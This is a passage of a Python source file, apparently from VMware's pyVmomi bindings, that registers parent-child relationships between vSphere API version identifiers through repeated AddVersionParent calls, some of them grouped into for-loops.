AddVersionParent("vim.version.v7_0", "vmodl.version.version2")
AddVersionParent("vim.version.v7_0", "vim.version.v6_9_1")
AddVersionParent("vim.version.v7_0", "vim.version.v6_8_7")
AddVersionParent("vim.version.v7_0", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.v7_0", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.v7_0", "vim.version.version13")
AddVersionParent("vim.version.v7_0", "vim.version.version14")
AddVersionParent("vim.version.v7_0", "vim.version.version15")
AddVersionParent("vim.version.v7_0", "vim.version.version10")
AddVersionParent("vim.version.v7_0", "vim.version.version11")
AddVersionParent("vim.version.v7_0", "vim.version.version12")
AddVersionParent("vim.version.v7_0", "vim.version.v7_0")
AddVersionParent("vim.version.v7_0", "vim.version.version8")
AddVersionParent("vim.version.v7_0", "vim.version.version9")
AddVersionParent("vim.version.v7_0", "vim.version.version6")
AddVersionParent("vim.version.v7_0", "vim.version.version7")
AddVersionParent("vim.version.v7_0", "vim.version.version1")
AddVersionParent("vim.version.v7_0", "vim.version.version4")
AddVersionParent("vim.version.v7_0", "vim.version.version5")
AddVersionParent("vim.version.v7_0", "vim.version.version2")
AddVersionParent("vim.version.v7_0", "vim.version.version3")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vmodl.query.version.version4")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vmodl.query.version.version3")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vmodl.query.version.version2")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vmodl.query.version.version1")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vmodl.version.version0")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vmodl.version.version1")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vmodl.version.version2")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.v6_9_1")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.v6_8_7")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.version13")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.version14")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.version15")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.version10")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.version11")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.version12")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.v7_0")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.FileLockInfo_GSS34")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.version8")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.version9")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.version6")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.version7")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.version1")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.version4")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.version5")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.version2")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.version3")
AddVersionParent("vim.version.version8", "vmodl.query.version.version4")
AddVersionParent("vim.version.version8", "vmodl.query.version.version3")
AddVersionParent("vim.version.version8", "vmodl.query.version.version2")
AddVersionParent("vim.version.version8", "vmodl.query.version.version1")
AddVersionParent("vim.version.version8", "vmodl.version.version0")
AddVersionParent("vim.version.version8", "vmodl.version.version1")
AddVersionParent("vim.version.version8", "vmodl.version.version2")
AddVersionParent("vim.version.version8", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.version8", "vim.version.version8")
AddVersionParent("vim.version.version8", "vim.version.version6")
AddVersionParent("vim.version.version8", "vim.version.version7")
AddVersionParent("vim.version.version8", "vim.version.version1")
AddVersionParent("vim.version.version8", "vim.version.version4")
AddVersionParent("vim.version.version8", "vim.version.version5")
AddVersionParent("vim.version.version8", "vim.version.version2")
AddVersionParent("vim.version.version8", "vim.version.version3")
AddVersionParent("vim.version.version9", "vmodl.query.version.version4")
AddVersionParent("vim.version.version9", "vmodl.query.version.version3")
AddVersionParent("vim.version.version9", "vmodl.query.version.version2")
AddVersionParent("vim.version.version9", "vmodl.query.version.version1")
AddVersionParent("vim.version.version9", "vmodl.version.version0")
AddVersionParent("vim.version.version9", "vmodl.version.version1")
AddVersionParent("vim.version.version9", "vmodl.version.version2")
AddVersionParent("vim.version.version9", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.version9", "vim.version.version8")
AddVersionParent("vim.version.version9", "vim.version.version9")
AddVersionParent("vim.version.version9", "vim.version.version6")
AddVersionParent("vim.version.version9", "vim.version.version7")
AddVersionParent("vim.version.version9", "vim.version.version1")
AddVersionParent("vim.version.version9", "vim.version.version4")
AddVersionParent("vim.version.version9", "vim.version.version5")
AddVersionParent("vim.version.version9", "vim.version.version2")
AddVersionParent("vim.version.version9", "vim.version.version3")
AddVersionParent("vim.version.version6", "vmodl.query.version.version3")
AddVersionParent("vim.version.version6", "vmodl.query.version.version2")
AddVersionParent("vim.version.version6", "vmodl.query.version.version1")
AddVersionParent("vim.version.version6", "vmodl.version.version0")
AddVersionParent("vim.version.version6", "vmodl.version.version1")
AddVersionParent("vim.version.version6", "vim.version.version6")
AddVersionParent("vim.version.version6", "vim.version.version1")
AddVersionParent("vim.version.version6", "vim.version.version4")
AddVersionParent("vim.version.version6", "vim.version.version5")
AddVersionParent("vim.version.version6", "vim.version.version2")
AddVersionParent("vim.version.version6", "vim.version.version3")
AddVersionParent("vim.version.version7", "vmodl.query.version.version4")
AddVersionParent("vim.version.version7", "vmodl.query.version.version3")
AddVersionParent("vim.version.version7", "vmodl.query.version.version2")
AddVersionParent("vim.version.version7", "vmodl.query.version.version1")
AddVersionParent("vim.version.version7", "vmodl.version.version0")
AddVersionParent("vim.version.version7", "vmodl.version.version1")
AddVersionParent("vim.version.version7", "vmodl.version.version2")
AddVersionParent("vim.version.version7", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.version7", "vim.version.version6")
AddVersionParent("vim.version.version7", "vim.version.version7")
AddVersionParent("vim.version.version7", "vim.version.version1")
AddVersionParent("vim.version.version7", "vim.version.version4")
AddVersionParent("vim.version.version7", "vim.version.version5")
AddVersionParent("vim.version.version7", "vim.version.version2")
AddVersionParent("vim.version.version7", "vim.version.version3")
AddVersionParent("vim.version.DiskGroupVMC", "vmodl.query.version.version4")
AddVersionParent("vim.version.DiskGroupVMC", "vmodl.query.version.version3")
AddVersionParent("vim.version.DiskGroupVMC", "vmodl.query.version.version2")
AddVersionParent("vim.version.DiskGroupVMC", "vmodl.query.version.version1")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.DiskGroupVMC", "vmodl.version.version0")
AddVersionParent("vim.version.DiskGroupVMC", "vmodl.version.version1")
AddVersionParent("vim.version.DiskGroupVMC", "vmodl.version.version2")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.v6_9_1")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.v6_8_7")
AddVersionParent("vim.version.DiskGroupVMC", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.DiskGroupVMC", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.version13")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.version14")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.version15")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.version10")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.version11")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.version12")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.v7_0")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.version8")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.version9")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.version6")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.version7")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.DiskGroupVMC")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.version1")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.version4")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.version5")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.version2")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.version3")
AddVersionParent("vim.version.TrustAuthority_V4", "vmodl.query.version.version4")
AddVersionParent("vim.version.TrustAuthority_V4", "vmodl.query.version.version3")
AddVersionParent("vim.version.TrustAuthority_V4", "vmodl.query.version.version2")
AddVersionParent("vim.version.TrustAuthority_V4", "vmodl.query.version.version1")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.TrustAuthority_V4", "vmodl.version.version0")
AddVersionParent("vim.version.TrustAuthority_V4", "vmodl.version.version1")
AddVersionParent("vim.version.TrustAuthority_V4", "vmodl.version.version2")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.v6_9_1")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.v6_8_7")
AddVersionParent("vim.version.TrustAuthority_V4", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.TrustAuthority_V4", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.version13")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.version14")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.version15")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.version10")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.version11")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.version12")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.v7_0")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.version8")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.version9")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.version6")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.version7")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.TrustAuthority_V4")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.version1")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.version4")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.version5")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.version2")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.version3")
AddVersionParent("vim.version.version1", "vmodl.query.version.version1")
AddVersionParent("vim.version.version1", "vmodl.version.version0")
AddVersionParent("vim.version.version1", "vim.version.version1")
AddVersionParent("vim.version.version4", "vmodl.query.version.version1")
AddVersionParent("vim.version.version4", "vmodl.version.version0")
AddVersionParent("vim.version.version4", "vim.version.version1")
AddVersionParent("vim.version.version4", "vim.version.version4")
AddVersionParent("vim.version.version4", "vim.version.version2")
AddVersionParent("vim.version.version4", "vim.version.version3")
AddVersionParent("vim.version.version5", "vmodl.query.version.version2")
AddVersionParent("vim.version.version5", "vmodl.query.version.version1")
AddVersionParent("vim.version.version5", "vmodl.version.version0")
AddVersionParent("vim.version.version5", "vmodl.version.version1")
AddVersionParent("vim.version.version5", "vim.version.version1")
AddVersionParent("vim.version.version5", "vim.version.version4")
AddVersionParent("vim.version.version5", "vim.version.version5")
AddVersionParent("vim.version.version5", "vim.version.version2")
AddVersionParent("vim.version.version5", "vim.version.version3")
AddVersionParent("vim.version.SRIOVValidNumVFs", "vmodl.query.version.version4")
AddVersionParent("vim.version.SRIOVValidNumVFs", "vmodl.query.version.version3")
AddVersionParent("vim.version.SRIOVValidNumVFs", "vmodl.query.version.version2")
AddVersionParent("vim.version.SRIOVValidNumVFs", "vmodl.query.version.version1")
# Parent-version registrations for "vim.version.SRIOVValidNumVFs".
# Same calls, same order as the generated one-call-per-line form; the
# child listing itself as a parent follows this file's generated convention.
for _parentVersion in (
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v8_0_0_0",
    "vim.version.v7_0_3_1",
    "vim.version.v7_0_3_2",
    "vim.version.v7_0_3_0",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.v7_0_2_0",
    "vim.version.v7_0_2_1",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.SRIOVValidNumVFs",
    "vim.version.version2",
    "vim.version.version3",
):
    AddVersionParent("vim.version.SRIOVValidNumVFs", _parentVersion)
# Parent-version registrations for "vim.version.version2"
# (identical calls, identical order to the generated per-line form).
for _parentVersion in (
    "vmodl.query.version.version1",
    "vmodl.version.version0",
    "vim.version.version1",
    "vim.version.version2",
):
    AddVersionParent("vim.version.version2", _parentVersion)
# Parent-version registrations for "vim.version.version3"
# (identical calls, identical order to the generated per-line form).
for _parentVersion in (
    "vmodl.query.version.version1",
    "vmodl.version.version0",
    "vim.version.version1",
    "vim.version.version2",
    "vim.version.version3",
):
    AddVersionParent("vim.version.version3", _parentVersion)
# Parent-version registrations for "vim.version.NDU_VSPHERE_HA_INTEGRATION".
# Same calls, same order as the generated one-call-per-line form; the
# trailing self entry follows this file's generated convention.
for _parentVersion in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v8_0_0_0",
    "vim.version.v7_0_3_1",
    "vim.version.v7_0_3_2",
    "vim.version.v7_0_3_0",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.v7_0_2_0",
    "vim.version.v7_0_2_1",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
    "vim.version.NDU_VSPHERE_HA_INTEGRATION",
):
    AddVersionParent("vim.version.NDU_VSPHERE_HA_INTEGRATION", _parentVersion)
# Parent-version registrations for "vim.version.VmxRebootPowerOff".
# Same calls, same order as the generated one-call-per-line form; the
# trailing self entry follows this file's generated convention.
for _parentVersion in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v8_0_0_0",
    "vim.version.v7_0_3_1",
    "vim.version.v7_0_3_2",
    "vim.version.v7_0_3_0",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.v7_0_2_0",
    "vim.version.v7_0_2_1",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
    "vim.version.VmxRebootPowerOff",
):
    AddVersionParent("vim.version.VmxRebootPowerOff", _parentVersion)
# Parent-version registrations for "vim.version.ClusteredEsx_V1".
# Same calls, same order as the generated one-call-per-line form; the
# trailing self entry follows this file's generated convention.
for _parentVersion in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v8_0_0_0",
    "vim.version.v7_0_3_1",
    "vim.version.v7_0_3_2",
    "vim.version.v7_0_3_0",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.v7_0_2_0",
    "vim.version.v7_0_2_1",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
    "vim.version.ClusteredEsx_V1",
):
    AddVersionParent("vim.version.ClusteredEsx_V1", _parentVersion)
# Parent-version registrations for "vim.version.fourKnStorageSupport".
# Same calls, same order as the generated one-call-per-line form; the
# trailing self entry follows this file's generated convention.
for _parentVersion in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v8_0_0_0",
    "vim.version.v7_0_3_1",
    "vim.version.v7_0_3_2",
    "vim.version.v7_0_3_0",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.v7_0_2_0",
    "vim.version.v7_0_2_1",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
    "vim.version.fourKnStorageSupport",
):
    AddVersionParent("vim.version.fourKnStorageSupport", _parentVersion)
# Parent-version registrations for "vim.version.resetportstatistics".
# Same calls, same order as the generated one-call-per-line form; the
# trailing self entry follows this file's generated convention.
for _parentVersion in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v8_0_0_0",
    "vim.version.v7_0_3_1",
    "vim.version.v7_0_3_2",
    "vim.version.v7_0_3_0",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.v7_0_2_0",
    "vim.version.v7_0_2_1",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
    "vim.version.resetportstatistics",
):
    AddVersionParent("vim.version.resetportstatistics", _parentVersion)
# Parent-version registrations for "vim.version.batchRenameSupport".
# Same calls, same order as the generated one-call-per-line form; the
# trailing self entry follows this file's generated convention.
for _parentVersion in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v8_0_0_0",
    "vim.version.v7_0_3_1",
    "vim.version.v7_0_3_2",
    "vim.version.v7_0_3_0",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.v7_0_2_0",
    "vim.version.v7_0_2_1",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
    "vim.version.batchRenameSupport",
):
    AddVersionParent("vim.version.batchRenameSupport", _parentVersion)
# Parent-version registrations for "dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT".
# Same calls, same order as the generated one-call-per-line form; the
# self entry follows this file's generated convention.
for _parentVersion in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "dp.version.version1",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v8_0_0_0",
    "vim.version.v7_0_3_1",
    "vim.version.v7_0_3_2",
    "vim.version.v7_0_3_0",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.v7_0_2_0",
    "vim.version.v7_0_2_1",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
    "dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT",
    "dp.version.v8_0_0_0",
):
    AddVersionParent("dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", _parentVersion)
# Parent-version registrations for "vim.version.VM_CLONE_SWITCH_HOST_EMM".
# Same calls, same order as the generated one-call-per-line form; the
# trailing self entry follows this file's generated convention.
for _parentVersion in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v8_0_0_0",
    "vim.version.v7_0_3_1",
    "vim.version.v7_0_3_2",
    "vim.version.v7_0_3_0",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.v7_0_2_0",
    "vim.version.v7_0_2_1",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
    "vim.version.VM_CLONE_SWITCH_HOST_EMM",
):
    AddVersionParent("vim.version.VM_CLONE_SWITCH_HOST_EMM", _parentVersion)
# Parent-version registrations for "dp.version.unstable".
# Same calls, same order as the generated one-call-per-line form; the
# self entry ("dp.version.unstable") follows this file's generated convention.
for _parentVersion in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.pcieHotPlugOfFPT",
    "vim.version.pr1429825",
    "vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT",
    "dp.version.VSPHERE_DP_TELEMETRY",
    "vim.version.MemoryTiering",
    "vim.version.v7_0_1_1",
    "vim.version.FCD_VRA_SUPPORT",
    "vim.version.guestDetailedData",
    "vim.version.SGX_MPA_VMCheck",
    "vim.version.vdcs",
    "vmodl.version.version0",
    "vim.version.NFS_VMKPORTBIND",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "dp.version.version1",
    "vim.version.v6_9_1",
    "vim.version.VMC_NFS_SUPPORT",
    "vim.version.NsxLiveUpdate",
    "vim.version.VDS_ReadOnlyDisk",
    "vim.version.v7_0_0_2",
    "vim.version.vVol_datastore_scalability",
    "vim.version.AssignHwCompositeDev",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v8_0_0_0",
    "vim.version.VQAT",
    "vim.version.VCDP_NestedFilters",
    "vim.version.nativeSnapshot",
    "vim.version.hostProfiles",
    "vim.version.GraphicsDRS",
    "vim.version.v7_0_3_1",
    "vim.version.v7_0_3_2",
    "vim.version.v7_0_3_0",
    "vim.version.hwh",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT",
    "vim.version.VSAN2_Configure",
    "vim.version.DRS_LB_REASONCODE",
    "vim.version.gosCrashRemediation",
    "vim.version.VCSOF_173",
    "vim.version.pciSriovExtendedID",
    "vim.version.vmxnet3UPT",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.VMcrypt_IntegrityProtection",
    "vim.version.version12",
    "vim.version.pciDeviceExt",
    "vim.version.toolsOffHost",
    "vim.version.hostCertificateManagement",
    "vim.version.vmMisc",
    "vim.version.VLCM_QuickLaunchPreload",
    "vim.version.LSI2PVSCSI",
    "vim.version.ProvisioningEventRefresh",
    "vim.version.OVF_SINGLEDEPLOY_API",
    "vim.version.v7_0_2_0",
    "vim.version.pr1803450",
    "vim.version.v7_0_2_1",
    "vim.version.VMcrypt_OnlineVMEncryption",
    "vim.version.FT_VBS_SUPPORT",
    "vim.version.WCP_FaultDomains",
    "vim.version.dnd",
    "vim.version.optional_virtual_disks",
    "vim.version.hwh2_0",
    "vim.version.v7_0_1_0",
    "vim.version.VM_OP_NOTIFICATION_TO_APP_V1",
    "vim.version.EventsOrdering",
    "vim.version.PMemV2",
    "vim.version.v7_0",
    "vim.version.FileLockInfo_GSS34",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.DiskGroupVMC",
    "vim.version.TrustAuthority_V4",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.SRIOVValidNumVFs",
    "vim.version.version2",
    "vim.version.version3",
    "vim.version.NDU_VSPHERE_HA_INTEGRATION",
    "vim.version.VmxRebootPowerOff",
    "vim.version.ClusteredEsx_V1",
    "vim.version.fourKnStorageSupport",
    "vim.version.resetportstatistics",
    "vim.version.batchRenameSupport",
    "dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT",
    "vim.version.VM_CLONE_SWITCH_HOST_EMM",
    "dp.version.unstable",
    "vim.version.SGX_MPA_HostReg",
    "vim.version.GreenMetrics",
    "vim.version.hostVendorSpecificStatus",
    "vim.version.VMcrypt_V4",
    "vim.version.hostAccessManager",
    "vim.version.ocmSupportedForReconfigure",
    "dp.version.v8_0_0_0",
    "vim.version.VirtualTopo",
    "vim.version.Tools_Update_Health",
    "vim.version.CPU_Scheduler_Info",
